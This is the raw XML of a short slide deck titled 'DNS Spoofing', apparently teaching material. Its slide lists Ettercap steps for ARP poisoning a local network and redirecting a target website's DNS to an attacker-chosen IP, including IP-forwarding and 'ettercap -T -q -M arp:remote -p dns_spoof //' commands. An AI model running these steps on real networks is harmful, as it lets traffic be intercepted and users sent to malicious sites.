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FAA0992-F13A-46E8-9231-90D955684381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738079-8C63-4775-8BF9-612231F43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DNS Spoofing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echo 1&gt;&gt; /proc/sys/net/ipv4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ip_forward</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Locate etter.dns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> [path to etter.dns]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then edit the target website to our desired IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –h </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –T –q –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arp:remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dns_spoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> //</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>stop sniffing press ‘q’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Steps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</TotalTime>
  <Words>49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DNS Spoofing</vt:lpstr>
      <vt:lpstr>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Spoofing</dc:title>
  <dc:creator>ARB</dc:creator>
  <cp:lastModifiedBy>ROBOTICS</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-06-04T04:56:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-04T13:20:41Z</dcterms:modified>
</cp:coreProperties>
</file>